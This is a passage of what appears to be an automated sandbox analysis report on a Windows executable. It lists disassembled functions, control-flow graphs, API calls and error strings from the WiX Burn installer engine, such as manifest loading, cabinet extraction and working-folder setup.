                                                                                                                                                                    • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                                                                                                                    • API String ID: 3411815225-695169583
                                                                                                                                                                    • Opcode ID: aff397154feaedcee76061bcd56b5a9a8d66c5f8b0a4cf694801308e204048f6
                                                                                                                                                                    • Instruction ID: ac76f8d077b833a45698620d5a5f2155d7763338b77769a245bf7146b36a1521
                                                                                                                                                                    • Opcode Fuzzy Hash: aff397154feaedcee76061bcd56b5a9a8d66c5f8b0a4cf694801308e204048f6
                                                                                                                                                                    • Instruction Fuzzy Hash: 4112E772940235ABDB30AB55CC46FAB76A4AF05B54F1101ADFD04BB281E7709E41DBE8
                                                                                                                                                                    Function 00CA0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 365 ca0d16-ca0d2d SetEvent 366 ca0d6f-ca0d7d WaitForSingleObject 365->366 367 ca0d2f-ca0d39 GetLastError 365->367 370 ca0d7f-ca0d89 GetLastError 366->370 371 ca0db4-ca0dbf ResetEvent 366->371 368 ca0d3b-ca0d44 367->368 369 ca0d46 367->369 368->369 372 ca0d48 369->372 373 ca0d4d-ca0d5d call c83821 369->373 376 ca0d8b-ca0d94 370->376 377 ca0d96 370->377 374 ca0df9-ca0dff 371->374 375 ca0dc1-ca0dcb GetLastError 371->375 372->373 395 ca0d62-ca0d6a call cc0237 373->395 381 ca0e32-ca0e4b call c821ac 374->381 382 ca0e01-ca0e04 374->382 378 ca0dd8 375->378 379 ca0dcd-ca0dd6 375->379 376->377 383 ca0d98 377->383 384 ca0d9d-ca0db2 call c83821 377->384 387 ca0dda 378->387 388 ca0ddf-ca0df4 call c83821 378->388 379->378 398 ca0e4d-ca0e5e call cc0237 381->398 399 ca0e63-ca0e6e SetEvent 381->399 390 ca0e28-ca0e2d 382->390 391 ca0e06-ca0e23 call c83821 382->391 383->384 384->395 387->388 388->395 392 ca10e8-ca10ed 390->392 405 ca10de-ca10e4 call cc0237 391->405 400 ca10ef 392->400 401 ca10f2-ca10f8 392->401 395->392 419 ca10e5-ca10e7 398->419 407 ca0ea8-ca0eb6 WaitForSingleObject 399->407 408 ca0e70-ca0e7a GetLastError 399->408 400->401 405->419 410 ca0eb8-ca0ec2 GetLastError 407->410 411 ca0ef0-ca0efb ResetEvent 407->411 414 ca0e7c-ca0e85 408->414 415 ca0e87 408->415 416 ca0ecf 410->416 417 ca0ec4-ca0ecd 410->417 420 ca0efd-ca0f07 GetLastError 411->420 421 ca0f35-ca0f3c 411->421 414->415 422 ca0e89 415->422 423 ca0e8e-ca0ea3 call c83821 415->423 426 ca0ed1 416->426 427 ca0ed6-ca0eeb call c83821 416->427 417->416 419->392 428 ca0f09-ca0f12 420->428 429 ca0f14 420->429 424 ca0fab-ca0fce CreateFileW 421->424 425 ca0f3e-ca0f41 421->425 422->423 448 ca10dd 423->448 437 ca100b-ca101f SetFilePointerEx 424->437 438 ca0fd0-ca0fda GetLastError 424->438 431 ca0f6e-ca0f72 call c8394f 425->431 432 ca0f43-ca0f46 425->432 426->427 427->448 428->429 434 ca0f1b-ca0f30 call c83821 429->434 435 ca0f16 429->435 455 ca0f77-ca0f7c 431->455 441 ca0f48-ca0f4b 432->441 442 ca0f67-ca0f69 432->442 434->448 435->434 445 ca1059-ca1064 SetEndOfFile 437->445 446 ca1021-ca102b GetLastError 437->446 439 ca0fdc-ca0fe5 438->439 440 ca0fe7 438->440 439->440 451 ca0fe9 440->451 452 ca0fee-ca1001 call c83821 440->452 453 ca0f5d-ca0f62 441->453 454 ca0f4d-ca0f53 441->454 442->392 449 ca109b-ca10a8 SetFilePointerEx 445->449 450 ca1066-ca1070 GetLastError 445->450 456 ca1038 446->456 457 ca102d-ca1036 446->457 448->405 449->419 462 ca10aa-ca10b4 GetLastError 449->462 459 ca107d 450->459 460 ca1072-ca107b 450->460 451->452 452->437 453->419 454->453 463 ca0f7e-ca0f98 call c83821 455->463 464 ca0f9d-ca0fa6 455->464 465 ca103a 456->465 466 ca103f-ca1054 call c83821 456->466 457->456 467 ca107f 459->467 468 ca1084-ca1099 call c83821 459->468 460->459 470 ca10c1 462->470 471 ca10b6-ca10bf 462->471 463->448 464->419 465->466 466->448 467->468 468->448 475 ca10c8-ca10d8 call c83821 470->475 476 ca10c3 470->476 471->470 475->448 476->475
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,00CA08BC,?,?), ref: 00CA0D25
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00CA08BC,?,?), ref: 00CA0D2F
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00CA08BC,?,?), ref: 00CA0D74
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00CA08BC,?,?), ref: 00CA0D7F
                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,00CA08BC,?,?), ref: 00CA0DB7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00CA08BC,?,?), ref: 00CA0DC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                    • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 1865021742-2104912459
                                                                                                                                                                    • Opcode ID: fedeebfa3022bbf74a9f90288e1ecebd102c186722b46303344d10a42382fe0b
                                                                                                                                                                    • Instruction ID: 009da7d5e54504a0f4972f241d12a03ac1106fa78021248abdc8c7b692a5f545
                                                                                                                                                                    • Opcode Fuzzy Hash: fedeebfa3022bbf74a9f90288e1ecebd102c186722b46303344d10a42382fe0b
                                                                                                                                                                    • Instruction Fuzzy Hash: 22912833A81633BBD33026E58D4AF2A7954BF02B68F224626FF60BB6C0D751DC0092D5
                                                                                                                                                                    Function 00C85195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 482 c85195-c85243 call caf8e0 * 2 GetModuleHandleW call cc04f8 call cc06ae call c8120a 493 c85259-c8526a call c842d7 482->493 494 c85245 482->494 499 c8526c-c85271 493->499 500 c85273-c8528f call c85618 CoInitializeEx 493->500 495 c8524a-c85254 call cc0237 494->495 503 c854d4-c854db 495->503 499->495 510 c85298-c852a4 call cbfcae 500->510 511 c85291-c85296 500->511 505 c854e8-c854ea 503->505 506 c854dd-c854e3 call cc5636 503->506 508 c854fa-c85518 call c8d82f call c9a8d6 call c9ab24 505->508 509 c854ec-c854f3 505->509 506->505 532 c8551a-c85522 508->532 533 c85546-c85559 call c84fa4 508->533 509->508 512 c854f5 call c941ec 509->512 519 c852b8-c852c7 call cc0e07 510->519 520 c852a6 510->520 511->495 512->508 529 c852c9-c852ce 519->529 530 c852d0-c852df call cc2af7 519->530 522 c852ab-c852b3 call cc0237 520->522 522->503 529->522 537 c852e8-c852f7 call cc3565 530->537 538 c852e1-c852e6 530->538 532->533 536 c85524-c85527 532->536 542 c8555b call cc3a35 533->542 543 c85560-c85567 533->543 536->533 540 c85529-c85544 call c9434c call c85602 536->540 551 c852f9-c852fe 537->551 552 c85300-c8531f GetVersionExW 537->552 538->522 540->533 542->543 548 c85569 call cc2efe 543->548 549 c8556e-c85575 543->549 548->549 554 c8557c-c85583 549->554 555 c85577 call cc1479 549->555 551->522 557 c85359-c8539e call c833c7 call c85602 552->557 558 c85321-c8532b GetLastError 552->558 560 c8558a-c8558c 554->560 561 c85585 call cbfdbd 554->561 555->554 584 c853a0-c853ab call cc5636 557->584 585 c853b1-c853c1 call c9752a 557->585 566 c85338 558->566 567 c8532d-c85336 558->567 564 c8558e CoUninitialize 560->564 565 c85594-c8559b 560->565 561->560 564->565 569 c8559d-c8559f 565->569 570 c855d6-c855df call cc0113 565->570 571 c8533a 566->571 572 c8533f-c85354 call c83821 566->572 567->566 575 c855a1-c855a3 569->575 576 c855a5-c855ab 569->576 582 c855e1 call c845ee 570->582 583 c855e6-c855ff call cc0802 call cae06f 570->583 571->572 572->522 580 c855ad-c855c6 call c93d85 call c85602 575->580 576->580 580->570 601 c855c8-c855d5 call c85602 580->601 582->583 584->585 597 c853cd-c853d6 585->597 598 c853c3 585->598 602 c853dc-c853df 597->602 603 c8549e-c854b4 call c84d39 597->603 598->597 601->570 606 c853e5-c853e8 602->606 607 c85476-c85489 call c84ae5 602->607 616 c854c0-c854d2 603->616 617 c854b6 603->617 608 c853ea-c853ed 606->608 609 c8544e-c8546a call c848ef 606->609 615 c8548e-c85492 607->615 613 c853ef-c853f2 608->613 614 c85426-c85442 call c84a88 608->614 609->616 624 c8546c 609->624 620 c85403-c85416 call c84c86 613->620 621 c853f4-c853f9 613->621 614->616 628 c85444 614->628 615->616 622 c85494 615->622 616->503 617->616 620->616 629 c8541c 620->629 621->620 622->603 624->607 628->609 629->614
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C85217
                                                                                                                                                                      • Part of subcall function 00CC04F8: InitializeCriticalSection.KERNEL32(00CEB5FC,?,00C85223,00000000,?,?,?,?,?,?), ref: 00CC050F
                                                                                                                                                                      • Part of subcall function 00C8120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00C8523F,00000000,?), ref: 00C81248
                                                                                                                                                                      • Part of subcall function 00C8120A: GetLastError.KERNEL32(?,?,?,00C8523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00C81252
                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00C85285
                                                                                                                                                                      • Part of subcall function 00CC0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00CC0E28
                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00C85317
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00C85321
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C8558E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize Regutil., xrefs: 00C852C9
                                                                                                                                                                    • Failed to initialize COM., xrefs: 00C85291
                                                                                                                                                                    • Failed to initialize XML util., xrefs: 00C852F9
                                                                                                                                                                    • Failed to run per-user mode., xrefs: 00C85494
                                                                                                                                                                    • Failed to run untrusted mode., xrefs: 00C854B6
                                                                                                                                                                    • Failed to get OS info., xrefs: 00C8534F
                                                                                                                                                                    • Failed to initialize Wiutil., xrefs: 00C852E1
                                                                                                                                                                    • Failed to run RunOnce mode., xrefs: 00C8541C
                                                                                                                                                                    • Invalid run mode., xrefs: 00C853F9
                                                                                                                                                                    • 3.11.1.2318, xrefs: 00C85384
                                                                                                                                                                    • Failed to run per-machine mode., xrefs: 00C8546C
                                                                                                                                                                    • Failed to initialize core., xrefs: 00C853C3
                                                                                                                                                                    • engine.cpp, xrefs: 00C85345
                                                                                                                                                                    • Failed to run embedded mode., xrefs: 00C85444
                                                                                                                                                                    • Failed to parse command line., xrefs: 00C85245
                                                                                                                                                                    • Failed to initialize Cryputil., xrefs: 00C852A6
                                                                                                                                                                    • Failed to initialize engine state., xrefs: 00C8526C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                                    • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                                    • API String ID: 3262001429-510904028
                                                                                                                                                                    • Opcode ID: 1f9893728cf3867409b32b502c40ea032dd25bea0bb57e984f63fe416d8e341a
                                                                                                                                                                    • Instruction ID: 60d5a19c236c9c84b8add44ce5cfe3a1f7f210e1acf40ef1bb66de5fe59f01b5
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f9893728cf3867409b32b502c40ea032dd25bea0bb57e984f63fe416d8e341a
                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB1B771D40A299BDB32BBA5CC46FED7674AF44319F0501E9F908B6241DBB09E80DB98
                                                                                                                                                                    Function 00C9752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 630 c9752a-c9756f call caf8e0 call c8762c 635 c9757b-c9758c call c8c407 630->635 636 c97571-c97576 630->636 642 c97598-c975a9 call c8c26e 635->642 643 c9758e-c97593 635->643 637 c97814-c9781b call cc0237 636->637 645 c9781c-c97821 637->645 649 c975ab-c975b0 642->649 650 c975b5-c975ca call c8c4c8 642->650 643->637 647 c97829-c9782d 645->647 648 c97823-c97824 call cc5636 645->648 652 c9782f-c97832 call cc5636 647->652 653 c97837-c9783c 647->653 648->647 649->637 662 c975cc-c975d1 650->662 663 c975d6-c975e6 call cac001 650->663 652->653 655 c9783e-c9783f call cc5636 653->655 656 c97844-c97851 call c8c1bb 653->656 655->656 664 c9785b-c9785f 656->664 665 c97853-c97856 call cc5636 656->665 662->637 671 c975e8-c975ed 663->671 672 c975f2-c97665 call c95c33 663->672 669 c97869-c9786d 664->669 670 c97861-c97864 call cc5636 664->670 665->664 674 c9786f-c97872 call c83a16 669->674 675 c97877-c9787f 669->675 670->669 671->637 679 c97671-c97676 672->679 680 c97667-c9766c 672->680 674->675 681 c97678 679->681 682 c9767d-c976b4 call c85602 GetCurrentProcess call cc0879 call c8827b 679->682 680->637 681->682 689 c976ce-c976e5 call c8827b 682->689 690 c976b6 682->690 696 c976ee-c976f3 689->696 697 c976e7-c976ec 689->697 691 c976bb-c976c9 call cc0237 690->691 691->645 698 c9774f-c97754 696->698 699 c976f5-c97707 call c8821f 696->699 697->691 701 c97774-c9777d 698->701 702 c97756-c97768 call c8821f 698->702 708 c97709-c9770e 699->708 709 c97713-c97723 call c83436 699->709 704 c97789-c9779d call c9a50c 701->704 705 c9777f-c97782 701->705 702->701 712 c9776a-c9776f 702->712 717 c9779f-c977a4 704->717 718 c977a6 704->718 705->704 710 c97784-c97787 705->710 708->637 721 c9772f-c97743 call c8821f 709->721 722 c97725-c9772a 709->722 710->704 713 c977ac-c977af 710->713 712->637 719 c977b1-c977b4 713->719 720 c977b6-c977cc call c8d5a0 713->720 717->637 718->713 719->645 719->720 727 c977ce-c977d3 720->727 728 c977d5-c977e4 call c8cbc5 720->728 721->698 730 c97745-c9774a 721->730 722->637 727->637 731 c977e9-c977ed 728->731 730->637 732 c977ef-c977f4 731->732 733 c977f6-c9780d call c8c8e6 731->733 732->637 733->645 736 c9780f 733->736 736->637
                                                                                                                                                                    Strings
                                                                                                                                                                    • WixBundleUILevel, xrefs: 00C976D6, 00C976E7
                                                                                                                                                                    • Failed to load manifest., xrefs: 00C975E8
                                                                                                                                                                    • Failed to set source process path variable., xrefs: 00C97709
                                                                                                                                                                    • Failed to initialize variables., xrefs: 00C97571
                                                                                                                                                                    • Failed to open manifest stream., xrefs: 00C975AB
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 00C97759
                                                                                                                                                                    • WixBundleSourceProcessFolder, xrefs: 00C97734
                                                                                                                                                                    • Failed to initialize internal cache functionality., xrefs: 00C9779F
                                                                                                                                                                    • Failed to overwrite the %ls built-in variable., xrefs: 00C976BB
                                                                                                                                                                    • WixBundleElevated, xrefs: 00C976A5, 00C976B6
                                                                                                                                                                    • Failed to extract bootstrapper application payloads., xrefs: 00C977EF
                                                                                                                                                                    • Failed to get source process folder from path., xrefs: 00C97725
                                                                                                                                                                    • WixBundleSourceProcessPath, xrefs: 00C976F8
                                                                                                                                                                    • Failed to set source process folder variable., xrefs: 00C97745
                                                                                                                                                                    • Failed to get manifest stream from container., xrefs: 00C975CC
                                                                                                                                                                    • Failed to get unique temporary folder for bootstrapper application., xrefs: 00C977CE
                                                                                                                                                                    • Failed to open attached UX container., xrefs: 00C9758E
                                                                                                                                                                    • Failed to load catalog files., xrefs: 00C9780F
                                                                                                                                                                    • Failed to parse command line., xrefs: 00C97667
                                                                                                                                                                    • Failed to set original source variable., xrefs: 00C9776A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                    • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                                    • API String ID: 32694325-1564579409
                                                                                                                                                                    • Opcode ID: 2ab66424fe9889832bb6a00461e5dcbe2920d3c2caab134a71969907f0aa71e2
                                                                                                                                                                    • Instruction ID: ebfb59ad91e26b02b01a949e29a5c9e93e9479db9401d858a3ebf5b701ee744d
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ab66424fe9889832bb6a00461e5dcbe2920d3c2caab134a71969907f0aa71e2
                                                                                                                                                                    • Instruction Fuzzy Hash: F1A1A472A5561ABBDF169AA4CC89FEEB76CBB04700F000726F615F7280D730EA44D7A4
                                                                                                                                                                    Function 00C8762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 842 c8762c-c87edf InitializeCriticalSection 843 c87ee2-c87f06 call c85623 842->843 846 c87f08-c87f0f 843->846 847 c87f13-c87f24 call cc0237 843->847 846->843 848 c87f11 846->848 850 c87f27-c87f39 call cae06f 847->850 848->850
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00C9756B,00C853BD,00000000,00C85445), ref: 00C8764C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                    • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                                    • API String ID: 32694325-3635313340
                                                                                                                                                                    • Opcode ID: dd13150a214693b00f12a1f0f8bdb4a8a4239a2bb2b7c58bcf8a5d14af269e27
                                                                                                                                                                    • Instruction ID: 7f40fe6f883efc44df37819bad52a4c475f841e17bdd5c06970462648b4607e6
                                                                                                                                                                    • Opcode Fuzzy Hash: dd13150a214693b00f12a1f0f8bdb4a8a4239a2bb2b7c58bcf8a5d14af269e27
                                                                                                                                                                    • Instruction Fuzzy Hash: F33238F0D116699BDF65CF5AC9887DDFAB4BB49308F5085EED20CA6211C7B00B898F49
                                                                                                                                                                    Function 00C982BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 854 c982ba-c98303 call caf8e0 857 c98309-c98317 GetCurrentProcess call cc0879 854->857 858 c9847c-c98489 call c82195 854->858 861 c9831c-c98329 857->861 863 c98498-c984aa call cae06f 858->863 864 c9848b 858->864 865 c9832f-c9833e GetWindowsDirectoryW 861->865 866 c983b7-c983c5 GetTempPathW 861->866 867 c98490-c98497 call cc0237 864->867 869 c98378-c98389 call c8337f 865->869 870 c98340-c9834a GetLastError 865->870 871 c983ff-c98411 UuidCreate 866->871 872 c983c7-c983d1 GetLastError 866->872 867->863 892 c9838b-c98390 869->892 893 c98395-c983ab call c836a3 869->893 878 c9834c-c98355 870->878 879 c98357 870->879 875 c9841a-c9842f StringFromGUID2 871->875 876 c98413-c98418 871->876 880 c983de 872->880 881 c983d3-c983dc 872->881 884 c9844d-c9846e call c81f13 875->884 885 c98431-c9844b call c83821 875->885 876->867 878->879 886 c98359 879->886 887 c9835e-c98373 call c83821 879->887 888 c983e0 880->888 889 c983e5-c983fa call c83821 880->889 881->880 902 c98470-c98475 884->902 903 c98477 884->903 885->867 886->887 887->867 888->889 889->867 892->867 893->871 904 c983ad-c983b2 893->904 902->867 903->858 904->867
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00C85489), ref: 00C98310
                                                                                                                                                                      • Part of subcall function 00CC0879: OpenProcessToken.ADVAPI32(?,00000008,?,00C853BD,00000000,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC0897
                                                                                                                                                                      • Part of subcall function 00CC0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08A1
                                                                                                                                                                      • Part of subcall function 00CC0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC092B
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00C98336
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C98340
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00C983BD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C983C7
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00C98406
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to concat Temp directory on windows path for working folder., xrefs: 00C983AD
                                                                                                                                                                    • cache.cpp, xrefs: 00C98364, 00C983EB, 00C9843C
                                                                                                                                                                    • Failed to copy working folder path., xrefs: 00C9848B
                                                                                                                                                                    • Failed to create working folder guid., xrefs: 00C98413
                                                                                                                                                                    • Failed to convert working folder guid into string., xrefs: 00C98446
                                                                                                                                                                    • %ls%ls\, xrefs: 00C98458
                                                                                                                                                                    • Failed to get windows path for working folder., xrefs: 00C9836E
                                                                                                                                                                    • Failed to get temp path for working folder., xrefs: 00C983F5
                                                                                                                                                                    • Failed to append bundle id on to temp path for working folder., xrefs: 00C98470
                                                                                                                                                                    • Failed to ensure windows path for working folder ended in backslash., xrefs: 00C9838B
                                                                                                                                                                    • Temp\, xrefs: 00C98395
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                    • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                                    • API String ID: 266130487-819636856
                                                                                                                                                                    • Opcode ID: 700189032057ac3fd7bf85d27b10a8476f0d2ea57d509843adf7161223d26a90
                                                                                                                                                                    • Instruction ID: 3763d516980ea7968094f3d9c17d176da5b5e38ec6f0ac9b8945e1b462edb2b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 700189032057ac3fd7bf85d27b10a8476f0d2ea57d509843adf7161223d26a90
                                                                                                                                                                    • Instruction Fuzzy Hash: F941D772A40325A7DB2096E4CC4EFAE73A8AB01F10F104566BB04E7280EA75DD0896E9
                                                                                                                                                                    Function 00CA10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
